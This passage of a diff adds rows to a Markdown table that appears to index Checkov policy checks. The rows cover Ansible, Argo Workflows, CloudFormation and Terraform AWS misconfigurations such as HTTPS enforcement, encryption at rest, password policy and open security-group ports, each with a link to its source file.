+|  140 | CKV2_ANSIBLE_1           | resource                         | tasks.uri                                                                                        | Ensure that HTTPS url is used with uri                                                                                                                                                                   | Ansible                 | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml)                                                                                                     |
+|  141 | CKV2_ANSIBLE_2           | resource                         | tasks.ansible.builtin.get_url                                                                    | Ensure that HTTPS url is used with get_url                                                                                                                                                               | Ansible                 | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml)                                                                                               |
+|  142 | CKV2_ANSIBLE_2           | resource                         | tasks.get_url                                                                                    | Ensure that HTTPS url is used with get_url                                                                                                                                                               | Ansible                 | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml)                                                                                               |
+|  143 | CKV2_ANSIBLE_3           | resource                         | block                                                                                            | Ensure block is handling task errors properly                                                                                                                                                            | Ansible                 | [BlockErrorHandling.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/BlockErrorHandling.yaml)                                                                                         |
+|  144 | CKV2_ANSIBLE_4           | resource                         | tasks.ansible.builtin.dnf                                                                        | Ensure that packages with untrusted or missing GPG signatures are not used by dnf                                                                                                                        | Ansible                 | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml)                                                                                         |
+|  145 | CKV2_ANSIBLE_4           | resource                         | tasks.dnf                                                                                        | Ensure that packages with untrusted or missing GPG signatures are not used by dnf                                                                                                                        | Ansible                 | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml)                                                                                         |
+|  146 | CKV2_ANSIBLE_5           | resource                         | tasks.ansible.builtin.dnf                                                                        | Ensure that SSL validation isn't disabled with dnf                                                                                                                                                       | Ansible                 | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml)                                                                                                     |
+|  147 | CKV2_ANSIBLE_5           | resource                         | tasks.dnf                                                                                        | Ensure that SSL validation isn't disabled with dnf                                                                                                                                                       | Ansible                 | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml)                                                                                                     |
+|  148 | CKV2_ANSIBLE_6           | resource                         | tasks.ansible.builtin.dnf                                                                        | Ensure that certificate validation isn't disabled with dnf                                                                                                                                               | Ansible                 | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml)                                                                                             |
+|  149 | CKV2_ANSIBLE_6           | resource                         | tasks.dnf                                                                                        | Ensure that certificate validation isn't disabled with dnf                                                                                                                                               | Ansible                 | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml)                                                                                             |
+|  150 | CKV_ARGO_1               | argo_workflows                   | spec                                                                                             | Ensure Workflow pods are not using the default ServiceAccount                                                                                                                                            | Argo Workflows          | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/DefaultServiceAccount.py)                                                                                    |
+|  151 | CKV_ARGO_2               | argo_workflows                   | spec                                                                                             | Ensure Workflow pods are running as non-root user                                                                                                                                                        | Argo Workflows          | [RunAsNonRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/RunAsNonRoot.py)                                                                                                      |
+|  152 | CKV_AWS_1                | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py)                                                                                             |
+|  153 | CKV_AWS_1                | resource                         | serverless_aws                                                                                   | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | serverless              | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AdminPolicyDocument.py)                                                                                        |
+|  154 | CKV_AWS_2                | resource                         | AWS::ElasticLoadBalancingV2::Listener                                                            | Ensure ALB protocol is HTTPS                                                                                                                                                                             | Cloudformation          | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py)                                                                                          |
+|  155 | CKV_AWS_2                | resource                         | aws_alb_listener                                                                                 | Ensure ALB protocol is HTTPS                                                                                                                                                                             | Terraform               | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py)                                                                                               |
+|  156 | CKV_AWS_2                | resource                         | aws_lb_listener                                                                                  | Ensure ALB protocol is HTTPS                                                                                                                                                                             | Terraform               | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py)                                                                                               |
+|  157 | CKV_AWS_3                | resource                         | AWS::EC2::Volume                                                                                 | Ensure all data stored in the EBS is securely encrypted                                                                                                                                                  | Cloudformation          | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EBSEncryption.py)                                                                                                |
+|  158 | CKV_AWS_3                | resource                         | aws_ebs_volume                                                                                   | Ensure all data stored in the EBS is securely encrypted                                                                                                                                                  | Terraform               | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py)                                                                                                     |
+|  159 | CKV_AWS_5                | resource                         | AWS::Elasticsearch::Domain                                                                       | Ensure all data stored in the Elasticsearch is securely encrypted at rest                                                                                                                                | Cloudformation          | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchEncryption.py)                                                                            |
+|  160 | CKV_AWS_5                | resource                         | aws_elasticsearch_domain                                                                         | Ensure all data stored in the Elasticsearch is securely encrypted at rest                                                                                                                                | Terraform               | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py)                                                                                 |
+|  161 | CKV_AWS_5                | resource                         | aws_opensearch_domain                                                                            | Ensure all data stored in the Elasticsearch is securely encrypted at rest                                                                                                                                | Terraform               | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py)                                                                                 |
+|  162 | CKV_AWS_6                | resource                         | AWS::Elasticsearch::Domain                                                                       | Ensure all Elasticsearch has node-to-node encryption enabled                                                                                                                                             | Cloudformation          | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py)                                                        |
+|  163 | CKV_AWS_6                | resource                         | aws_elasticsearch_domain                                                                         | Ensure all Elasticsearch has node-to-node encryption enabled                                                                                                                                             | Terraform               | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py)                                                             |
+|  164 | CKV_AWS_6                | resource                         | aws_opensearch_domain                                                                            | Ensure all Elasticsearch has node-to-node encryption enabled                                                                                                                                             | Terraform               | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py)                                                             |
+|  165 | CKV_AWS_7                | resource                         | AWS::KMS::Key                                                                                    | Ensure rotation for customer created CMKs is enabled                                                                                                                                                     | Cloudformation          | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSRotation.py)                                                                                                    |
+|  166 | CKV_AWS_7                | resource                         | aws_kms_key                                                                                      | Ensure rotation for customer created CMKs is enabled                                                                                                                                                     | Terraform               | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py)                                                                                                         |
+|  167 | CKV_AWS_8                | resource                         | AWS::AutoScaling::LaunchConfiguration                                                            | Ensure all data stored in the Launch configuration EBS is securely encrypted                                                                                                                             | Cloudformation          | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LaunchConfigurationEBSEncryption.py)                                                          |
+|  168 | CKV_AWS_8                | resource                         | aws_instance                                                                                     | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted                                                                                                | Terraform               | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py)                                                               |
+|  169 | CKV_AWS_8                | resource                         | aws_launch_configuration                                                                         | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted                                                                                                | Terraform               | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py)                                                               |
+|  170 | CKV_AWS_9                | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy expires passwords within 90 days or less                                                                                                                                      | Terraform               | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py)                                                                               |
+|  171 | CKV_AWS_10               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy requires minimum length of 14 or greater                                                                                                                                      | Terraform               | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py)                                                                                       |
+|  172 | CKV_AWS_11               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy requires at least one lowercase letter                                                                                                                                        | Terraform               | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py)                                                                     |
+|  173 | CKV_AWS_12               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy requires at least one number                                                                                                                                                  | Terraform               | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py)                                                                                       |
+|  174 | CKV_AWS_13               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy prevents password reuse                                                                                                                                                       | Terraform               | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py)                                                                                         |
+|  175 | CKV_AWS_14               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy requires at least one symbol                                                                                                                                                  | Terraform               | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py)                                                                                       |
+|  176 | CKV_AWS_15               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy requires at least one uppercase letter                                                                                                                                        | Terraform               | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py)                                                                     |
+|  177 | CKV_AWS_16               | resource                         | AWS::RDS::DBInstance                                                                             | Ensure all data stored in the RDS is securely encrypted at rest                                                                                                                                          | Cloudformation          | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEncryption.py)                                                                                                |
+|  178 | CKV_AWS_16               | resource                         | aws_db_instance                                                                                  | Ensure all data stored in the RDS is securely encrypted at rest                                                                                                                                          | Terraform               | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py)                                                                                                     |
+|  179 | CKV_AWS_17               | resource                         | AWS::RDS::DBInstance                                                                             | Ensure all data stored in RDS is not publicly accessible                                                                                                                                                 | Cloudformation          | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSPubliclyAccessible.py)                                                                                |
+|  180 | CKV_AWS_17               | resource                         | aws_db_instance                                                                                  | Ensure all data stored in RDS is not publicly accessible                                                                                                                                                 | Terraform               | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py)                                                                                     |
+|  181 | CKV_AWS_17               | resource                         | aws_rds_cluster_instance                                                                         | Ensure all data stored in RDS is not publicly accessible                                                                                                                                                 | Terraform               | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py)                                                                                     |
+|  182 | CKV_AWS_18               | resource                         | AWS::S3::Bucket                                                                                  | Ensure the S3 bucket has access logging enabled                                                                                                                                                          | Cloudformation          | [S3AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3AccessLogs.py)                                                                                                  |
+|  183 | CKV_AWS_18               | resource                         | aws_s3_bucket                                                                                    | Ensure the S3 bucket has access logging enabled                                                                                                                                                          | Terraform               | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml)                                                                                         |
+|  184 | CKV_AWS_19               | resource                         | AWS::S3::Bucket                                                                                  | Ensure the S3 bucket has server-side-encryption enabled                                                                                                                                                  | Cloudformation          | [S3Encryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Encryption.py)                                                                                                  |
+|  185 | CKV_AWS_19               | resource                         | aws_s3_bucket                                                                                    | Ensure all data stored in the S3 bucket is securely encrypted at rest                                                                                                                                    | Terraform               | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml)                                                                                   |
+|  186 | CKV_AWS_19               | resource                         | aws_s3_bucket_server_side_encryption_configuration                                               | Ensure all data stored in the S3 bucket is securely encrypted at rest                                                                                                                                    | Terraform               | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml)                                                                                   |
+|  187 | CKV_AWS_20               | resource                         | AWS::S3::Bucket                                                                                  | Ensure the S3 bucket does not allow READ permissions to everyone                                                                                                                                         | Cloudformation          | [S3PublicACLRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLRead.py)                                                                                            |
+|  188 | CKV_AWS_20               | resource                         | aws_s3_bucket                                                                                    | S3 Bucket has an ACL defined which allows public READ access.                                                                                                                                            | Terraform               | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml)                                                                                         |
+|  189 | CKV_AWS_20               | resource                         | aws_s3_bucket_acl                                                                                | S3 Bucket has an ACL defined which allows public READ access.                                                                                                                                            | Terraform               | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml)                                                                                         |
+|  190 | CKV_AWS_21               | resource                         | AWS::S3::Bucket                                                                                  | Ensure the S3 bucket has versioning enabled                                                                                                                                                              | Cloudformation          | [S3Versioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Versioning.py)                                                                                                  |
+|  191 | CKV_AWS_21               | resource                         | aws_s3_bucket                                                                                    | Ensure all data stored in the S3 bucket have versioning enabled                                                                                                                                          | Terraform               | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml)                                                                                   |
+|  192 | CKV_AWS_21               | resource                         | aws_s3_bucket_versioning                                                                         | Ensure all data stored in the S3 bucket have versioning enabled                                                                                                                                          | Terraform               | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml)                                                                                   |
+|  193 | CKV_AWS_22               | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure SageMaker Notebook is encrypted at rest using KMS CMK                                                                                                                                             | Terraform               | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py)                                                                         |
+|  194 | CKV_AWS_23               | resource                         | AWS::EC2::SecurityGroup                                                                          | Ensure every security groups rule has a description                                                                                                                                                      | Cloudformation          | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                  |
+|  195 | CKV_AWS_23               | resource                         | AWS::EC2::SecurityGroupEgress                                                                    | Ensure every security groups rule has a description                                                                                                                                                      | Cloudformation          | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                  |
+|  196 | CKV_AWS_23               | resource                         | AWS::EC2::SecurityGroupIngress                                                                   | Ensure every security groups rule has a description                                                                                                                                                      | Cloudformation          | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                  |
+|  197 | CKV_AWS_23               | resource                         | aws_db_security_group                                                                            | Ensure every security group and rule has a description                                                                                                                                                   | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|  198 | CKV_AWS_23               | resource                         | aws_elasticache_security_group                                                                   | Ensure every security group and rule has a description                                                                                                                                                   | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|  199 | CKV_AWS_23               | resource                         | aws_redshift_security_group                                                                      | Ensure every security group and rule has a description                                                                                                                                                   | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|  200 | CKV_AWS_23               | resource                         | aws_security_group                                                                               | Ensure every security group and rule has a description                                                                                                                                                   | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|  201 | CKV_AWS_23               | resource                         | aws_security_group_rule                                                                          | Ensure every security group and rule has a description                                                                                                                                                   | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|  202 | CKV_AWS_23               | resource                         | aws_vpc_security_group_egress_rule                                                               | Ensure every security group and rule has a description                                                                                                                                                   | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|  203 | CKV_AWS_23               | resource                         | aws_vpc_security_group_ingress_rule                                                              | Ensure every security group and rule has a description                                                                                                                                                   | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                                       |
+|  204 | CKV_AWS_24               | resource                         | AWS::EC2::SecurityGroup                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Cloudformation          | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                      |
+|  205 | CKV_AWS_24               | resource                         | AWS::EC2::SecurityGroupIngress                                                                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Cloudformation          | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                      |
+|  206 | CKV_AWS_24               | resource                         | aws_security_group                                                                               | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                           |
+|  207 | CKV_AWS_24               | resource                         | aws_security_group_rule                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                           |
+|  208 | CKV_AWS_24               | resource                         | aws_vpc_security_group_ingress_rule                                                              | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                           |
+|  209 | CKV_AWS_25               | resource                         | AWS::EC2::SecurityGroup                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Cloudformation          | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                                  |
+|  210 | CKV_AWS_25               | resource                         | AWS::EC2::SecurityGroupIngress                                                                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Cloudformation          | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                                  |
+|  211 | CKV_AWS_25               | resource                         | aws_security_group                                                                               | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                                       |
+|  212 | CKV_AWS_25               | resource                         | aws_security_group_rule                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                                       |
+|  213 | CKV_AWS_25               | resource                         | aws_vpc_security_group_ingress_rule                                                              | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                                       |
+|  214 | CKV_AWS_26               | resource                         | AWS::SNS::Topic                                                                                  | Ensure all data stored in the SNS topic is encrypted                                                                                                                                                     | Cloudformation          | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SNSTopicEncryption.py)                                                                                      |
+|  215 | CKV_AWS_26               | resource                         | aws_sns_topic                                                                                    | Ensure all data stored in the SNS topic is encrypted                                                                                                                                                     | Terraform               | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py)                                                                                           |
+|  216 | CKV_AWS_27               | resource                         | AWS::SQS::Queue                                                                                  | Ensure all data stored in the SQS queue is encrypted                                                                                                                                                     | Cloudformation          | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SQSQueueEncryption.py)                                                                                      |
+|  217 | CKV_AWS_27               | resource                         | aws_sqs_queue                                                                                    | Ensure all data stored in the SQS queue is encrypted                                                                                                                                                     | Terraform               | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py)                                                                                           |
+|  218 | CKV_AWS_28               | resource                         | AWS::DynamoDB::Table                                                                             | Ensure DynamoDB point in time recovery (backup) is enabled                                                                                                                                               | Cloudformation          | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbRecovery.py)                                                                                          |
+|  219 | CKV_AWS_28               | resource                         | aws_dynamodb_table                                                                               | Ensure DynamoDB point in time recovery (backup) is enabled                                                                                                                                               | Terraform               | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py)                                                                                               |
+|  220 | CKV_AWS_29               | resource                         | AWS::ElastiCache::ReplicationGroup                                                               | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest                                                                                                                | Cloudformation          | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py)                                    |
+|  221 | CKV_AWS_29               | resource                         | aws_elasticache_replication_group                                                                | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest                                                                                                                | Terraform               | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py)                                         |
+|  222 | CKV_AWS_30               | resource                         | AWS::ElastiCache::ReplicationGroup                                                               | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit                                                                                                             | Cloudformation          | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py)                              |
+|  223 | CKV_AWS_30               | resource                         | aws_elasticache_replication_group                                                                | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit                                                                                                             | Terraform               | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py)                                   |
+|  224 | CKV_AWS_31               | resource                         | AWS::ElastiCache::ReplicationGroup                                                               | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token                                                                                          | Cloudformation          | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py)            |
+|  225 | CKV_AWS_31               | resource                         | aws_elasticache_replication_group                                                                | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token                                                                                          | Terraform               | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py)                 |
+|  226 | CKV_AWS_32               | resource                         | AWS::ECR::Repository                                                                             | Ensure ECR policy is not set to public                                                                                                                                                                   | Cloudformation          | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRPolicy.py)                                                                                                        |
+|  227 | CKV_AWS_32               | resource                         | aws_ecr_repository_policy                                                                        | Ensure ECR policy is not set to public                                                                                                                                                                   | Terraform               | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py)                                                                                                             |
+|  228 | CKV_AWS_33               | resource                         | AWS::KMS::Key                                                                                    | Ensure KMS key policy does not contain wildcard (*) principal                                                                                                                                            | Cloudformation          | [KMSKeyWildCardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSKeyWildCardPrincipal.py)                                                                            |
+|  229 | CKV_AWS_33               | resource                         | aws_kms_key                                                                                      | Ensure KMS key policy does not contain wildcard (*) principal                                                                                                                                            | Terraform               | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py)                                                                                 |
+|  230 | CKV_AWS_34               | resource                         | AWS::CloudFront::Distribution                                                                    | Ensure CloudFront Distribution ViewerProtocolPolicy is set to HTTPS                                                                                                                                      | Cloudformation          | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionEncryption.py)                                                          |
+|  231 | CKV_AWS_34               | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS                                                                                                                                      | Terraform               | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py)                                                               |
+|  232 | CKV_AWS_35               | resource                         | AWS::CloudTrail::Trail                                                                           | Ensure CloudTrail logs are encrypted at rest using KMS CMKs                                                                                                                                              | Cloudformation          | [CloudtrailEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py)                                                                                  |
